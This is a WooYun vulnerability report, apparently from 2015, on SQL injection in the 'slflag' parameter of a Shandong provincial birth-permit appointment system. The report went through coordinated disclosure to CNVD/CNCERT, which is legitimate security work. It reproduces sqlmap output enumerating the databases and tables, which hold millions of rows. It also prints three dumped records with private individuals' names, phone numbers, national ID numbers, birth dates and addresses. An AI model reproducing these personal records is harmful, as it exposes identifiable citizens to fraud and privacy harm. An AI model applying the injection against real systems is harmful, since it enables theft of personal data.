当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0153114

漏洞标题:山东省生育证预约系SQL注入数百万个人信息(看看哪些人要二胎)

相关厂商:山东省卫生和计划生育委员会

漏洞作者: 撸撸侠

提交时间:2015-11-09 19:19

修复时间:2016-01-11 15:32

公开时间:2016-01-11 15:32

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-11-09: 细节已通知厂商并且等待厂商处理中
2015-11-20: 厂商已经确认,细节仅向厂商公开
2015-11-30: 细节向核心白帽子及相关领域专家公开
2015-12-10: 细节向普通白帽子公开
2015-12-20: 细节向实习白帽子公开
2016-01-11: 细节向公众公开

简要描述:

山东省生育证预约系统sql注入数大量个人信息(看看哪些人要二胎)

详细说明:

**.**.**.**:8080/
**.**.**.**:8080/Bzsq/syzList.aspx?dwdm=370000000000&slflag=2
参数slflag存在注入漏洞

[18:06:26] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2008
[18:06:26] [INFO] fetching database names
[18:06:26] [INFO] the SQL query used returns 15 entries
[18:06:26] [INFO] resumed: GAHJ_20140408
[18:06:26] [INFO] resumed: GAHJ_20140626
[18:06:26] [INFO] resumed: HJ_SWZXHJ
[18:06:26] [INFO] resumed: master
[18:06:26] [INFO] resumed: model
[18:06:26] [INFO] resumed: msdb
[18:06:26] [INFO] resumed: mz_12_13
[18:06:26] [INFO] resumed: mz08-1209
[18:06:26] [INFO] resumed: qmjk20140422
[18:06:26] [INFO] resumed: ReportServer
[18:06:26] [INFO] resumed: ReportServerTempDB
[18:06:26] [INFO] resumed: tempdb
[18:06:26] [INFO] resumed: wis_SX
[18:06:26] [INFO] resumed: wissheng201403
[18:06:26] [INFO] resumed: YHDJXT


Database: wis_SX
+-----------------------------+---------+
| Table                       | Entries |
+-----------------------------+---------+
| dbo.REP_SHADOW_GKB          | 4566806 |
| dbo.gkb                     | 1690632 |
| dbo.Rep_LogTable            | 1460029 |
| dbo.byzk                    | 1160478 |
| dbo.vbyzk                   | 1160477 |
| dbo.REP_SHADOW_JBQK         | 1067527 |


Database: HJ_SWZXHJ
+----------------------+---------+
| Table                | Entries |
+----------------------+---------+
| dbo.HJ_CZRKYW_SWZXHJ | 148743  |
+----------------------+---------+


Database: YHDJXT
+----------------+---------+
| Table          | Entries |
+----------------+---------+
| dbo.qh_bak0708 | 149006  |
| dbo.qh_bak0708 | 149006  |
| dbo.qhrz       | 93152   |
| dbo.YHDJZMXX   | 45152   |
| dbo.TBHZ       | 4211    |
| dbo.userinfo   | 2154    |

漏洞证明:

屏幕快照 2015-11-09 下午7.00.33.png


bz1	jbr	lxdh	yysj	slsj	fnxm	zfxm	sqsj	lzrq	fnhjd	zfxjd	zfhjd	sqdbh	fnxjd	zfcsrq	zfhkxz	fnsfhm	fnhkxz	sldwmc	fncsrq	shyysj	slflag	zncsrq	sldwdm	znxb_2	zfdszn	fndszn	zfsfhm	wisfnbm	wisgldw
不符合政策规定	宗文文	15094791788	2015-01-05—2015-01-08	01  6 2015 11:45AM	周文静	张贵祯	01  2 2015  9:06PM	01  6 2015 11:45AM	370983001006	370983111220	370983111220	201501010955126902	370983111220	01 21 1989 12:00AM	2	370983198711286181	1	山东省泰安市肥城市边院镇	11 28 1987 12:00AM	NULL	3	03  6 2011 12:00AM	370983111000	NULL	2	2	370983198901216133	370983111220000360	370983111000
重复办理服务手册。	玉皇庙计生办	13668810151	<blank>	01  6 2015  2:29PM	曲寿红	张广树	01  2 2015  9:19PM	01  6 2015  2:29PM	<blank>	<blank>	<blank>	201501020921334367	<blank>	12  5 1991 12:00AM	2	370126199012055628	2	山东省济南市商河县玉皇庙镇	12  5 1990 12:00AM	NULL	3	10 29 2014 12:00AM	370126105000	NULL	1	2	370126199112050015	370126000000129520	370126105000
经核实可以办理	张金玲	13468460695	2015-01-27—2015-01-30	01  9 2015  2:46PM	马宁宁	张明	01  4 2015  3:10PM	01  9 2015  2:46PM	<blank>	<blank>	<blank>	201501040312185472	<blank>	11 30 1983 12:00AM	<blank>	370724198207183908	<blank>	山东省潍坊市潍城区北关街道办事处	07 18 1982 12:00AM	NULL	2	04  5 2009 12:00AM	370702004000	NULL	1	2	371202198311305712	370702004425000387	370702004000


修复方案:

版权声明:转载请注明来源 撸撸侠@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:13

确认时间:2015-11-20 14:33

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT下发给山东分中心,由其后续协调网站管理单位处置。

最新状态:

暂无